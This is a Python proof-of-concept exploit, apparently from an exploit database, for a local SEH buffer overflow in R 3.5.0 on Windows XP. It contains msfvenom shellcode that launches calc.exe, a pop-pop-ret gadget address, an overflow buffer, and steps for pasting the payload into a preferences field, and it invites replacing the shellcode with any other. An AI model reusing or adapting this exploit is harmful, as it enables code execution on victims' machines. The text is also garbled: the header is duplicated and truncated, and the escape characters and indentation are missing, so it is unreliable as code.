R i386 3.5.0 Local Buffer Overflow

#!/usr/bin/python
# Exploit Title: R i386 3.5.0 - Local Buffer Overflow (SEH)
# Date: 30/01/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.r #!/usr/bin/python
# Exploit Title: R i386 3.5.0 - Local Buffer Overflow (SEH)
# Date: 30/01/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.r-project.org/
# Version: 3.5.0
# Software Link: https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Version: 3.5.0
# Tested on: Windows XP Prof SP3 ENG x86
# Note: SEH exploitation method (SEH + DEP Bypass exploit for Windows 7 x86 by Bzyo available on exploit-db)
# CVE: TBC from Mitre
# Created in preparation for OSCE - DC - Telspace Systems
# PoC:
# 1.) Generate exploit.txt, copy the contents to clipboard
# 2.) In the application, open 'Edit' then 'Gui Preferences'
# 3.) Paste the contents of exploit.txt under 'Language for menus and messages'
# 4.) Click OK - Calc POPS (or change shellcode to whatever you require, take note of badchars!)

#PPR Information
#Message= 0x6cb99185 : pop ebx # pop esi # ret 0x08 | {PAGE_EXECUTE_READ} [R.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.5.0

#msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -b "x00x0ax0dx1ax7d" -f c
shellcode = ("xd9xc6xb8x06x7fx92x78xd9x74x24xf4x5bx29xc9xb1"
"x31x83xc3x04x31x43x14x03x43x12x9dx67x84xf2xe3"
"x88x75x02x84x01x90x33x84x76xd0x63x34xfcxb4x8f"
"xbfx50x2dx04xcdx7cx42xadx78x5bx6dx2exd0x9fxec"
"xacx2bxccxcex8dxe3x01x0excax1exebx42x83x55x5e"
"x73xa0x20x63xf8xfaxa5xe3x1dx4axc7xc2xb3xc1x9e"
"xc4x32x06xabx4cx2dx4bx96x07xc6xbfx6cx96x0ex8e"
"x8dx35x6fx3fx7cx47xb7x87x9fx32xc1xf4x22x45x16"
"x87xf8xc0x8dx2fx8ax73x6axcex5fxe5xf9xdcx14x61"
"xa5xc0xabxa6xddxfcx20x49x32x75x72x6ex96xdex20"
"x0fx8fxbax87x30xcfx65x77x95x9bx8bx6cxa4xc1xc1"
"x73x3ax7cxa7x74x44x7fx97x1cx75xf4x78x5ax8axdf"
"x3dx94xc0x42x17x3dx8dx16x2ax20x2excdx68x5dxad"
"xe4x10x9axadx8cx15xe6x69x7cx67x77x1cx82xd4x78"
"x35xe1xbbxeaxd5xc8x5ex8bx7cx15")

buffer = "A" * 884 + "xEBx09x90x90" + "x85x91xb9x6c" + "x90" * 20 + shellcode + "D" * 8868

payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"